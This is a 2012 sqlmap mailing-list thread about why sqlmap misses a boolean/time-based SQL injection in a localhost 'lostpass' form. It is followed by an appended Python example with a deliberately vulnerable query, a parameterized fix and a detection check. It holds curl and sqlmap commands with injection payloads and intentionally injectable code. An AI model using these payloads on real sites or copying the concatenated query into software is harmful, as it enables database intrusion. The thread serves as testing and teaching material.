Thread: [sqlmap-users] sqlmap won't find an "AND boolean/time" based SQLi
From: cats <du...@al...> - 2012-01-07 16:10:54
OK, so I know that my site has an SQLi (AND boolean / MySQL time based). I even tried both of them myself and the results are very clear and simple, yet sqlmap doesn't seem to see it. It can find the time-based one at first, but it always ends up saying that it's a false positive.

cURL will give me the following result from the page, using "AND boolean based SQLi" with a true statement:

curl --data "lostpass=1'%20OR 1=1 AND 1='1" http://localhost/account/index.php

<div class='message' style='padding:10px;'>Your password was e-mailed to 1' OR 1='1</div>

And now a false one:

curl --data "lostpass=1' OR 1=1 AND 1='2" http://localhost/account/index.php

<td class='message'>The email address you entered 1' OR 1=1 AND 1='2 does not exist</p>

I have tried with --string and --text-only with sqlmap, but I get the same results over and over. Here's some sample output:

python sqlmap.py -u "http://localhost/account/index.php" --random-agent --data="lostpass=1' OR 1='1" --string="Your password was e-mailed to" --text-only --delay=5 --technique=TB

[16:57:34] [INFO] testing connection to the target url
[16:57:49] [INFO] heuristics detected web page charset 'ascii'
[16:57:50] [INFO] testing if the provided string is within the target URL page content
[16:57:56] [INFO] testing if POST parameter 'lostpass' is dynamic
[16:58:05] [INFO] confirming that POST parameter 'lostpass' is dynamic
[16:58:13] [INFO] POST parameter 'lostpass' is dynamic
[16:58:19] [WARNING] heuristic test shows that POST parameter 'lostpass' might not be injectable
[16:58:19] [INFO] testing sql injection on POST parameter 'lostpass'
[16:58:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:59:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:00:48] [INFO] POST parameter 'lostpass' is 'MySQL > 5.0.11 AND time-based blind' injectable
[17:00:48] [INFO] checking if the injection point on POST parameter 'lostpass' is a false positive
[17:03:09] [WARNING] false positive injection point detected
[17:03:09] [WARNING] POST parameter 'lostpass' is not injectable
[17:03:09] [CRITICAL] all parameters appear to be not injectable.

I tried with a sleep(5) injection manually as well, and it works like a charm. Any ideas?
From: Miroslav S. <mir...@gm...> - 2012-01-07 16:24:42
Hi.

This looks strange:

1'%20OR 1=1 AND 1='1
and
1' OR 1=1 AND 1='2

Could you please try to find the simplest vectors/payloads that work, e.g.:

1' AND '1'='1
1' AND '1'='2

From these payloads I am not sure why there is OR 1=1 and how it is evaluated to True or False (as OR 1=1 should evaluate in normal cases to True in both vectors you've sent).

Kind regards

--
Miroslav Stampar
http://about.me/stamparm
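Added example (not code from the thread or from sqlmap) illustrating both posts above: a hypothetical "lost password" lookup in the vulnerable string-concatenated form and in its parameterized form, plus a sqlmap-style --string check that flips between a TRUE and a FALSE vector. It assumes an in-memory SQLite table with constructed addresses; because SQLite, unlike MySQL, does not coerce '1' to 1 in 1='1', the thread's vectors are written with '1'='1' here, which also makes the AND-before-OR precedence behind the OR 1=1 AND ... vectors explicit.

```python
import sqlite3

# Constructed sample table; not data from the thread.
USERS = [("alice@example.com",), ("bob@example.com",)]

TRUE_MSG = "Your password was e-mailed to "
FALSE_TAIL = " does not exist"


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?)", USERS)
    return conn


def lostpass_vulnerable(user_input):
    """Hypothetical handler that splices the input into the WHERE clause."""
    sql = "SELECT email FROM users WHERE email = '%s'" % user_input
    row = _connect().execute(sql).fetchone()
    return TRUE_MSG + user_input if row else "The email address you entered " + user_input + FALSE_TAIL


def lostpass_fixed(user_input):
    """Same lookup with a bound parameter: the input is data, never SQL."""
    sql = "SELECT email FROM users WHERE email = ?"
    row = _connect().execute(sql, (user_input,)).fetchone()
    return TRUE_MSG + user_input if row else "The email address you entered " + user_input + FALSE_TAIL


def boolean_blind_detected(handler, true_payload, false_payload, marker):
    """--string style check: marker present for the TRUE vector, absent for FALSE."""
    return marker in handler(true_payload) and marker not in handler(false_payload)


# AND binds tighter than OR, so the vulnerable query parses as
#   email = '1' OR (1=1 AND '1'='1')   -> true for every row
#   email = '1' OR (1=1 AND '1'='2')   -> false for every row
OR_TRUE = "1' OR 1=1 AND '1'='1"
OR_FALSE = "1' OR 1=1 AND '1'='2"
# The simpler AND vectors only flip the page when the value in front of
# them is an existing address; with a non-existent '1' both return no row.
AND_TRUE = "1' AND '1'='1"
AND_FALSE = "1' AND '1'='2"

if __name__ == "__main__":
    for name, h in (("vulnerable", lostpass_vulnerable), ("fixed", lostpass_fixed)):
        print(name, "OR vectors flip page:", boolean_blind_detected(h, OR_TRUE, OR_FALSE, TRUE_MSG))
        print(name, "AND vectors flip page:", boolean_blind_detected(h, AND_TRUE, AND_FALSE, TRUE_MSG))
```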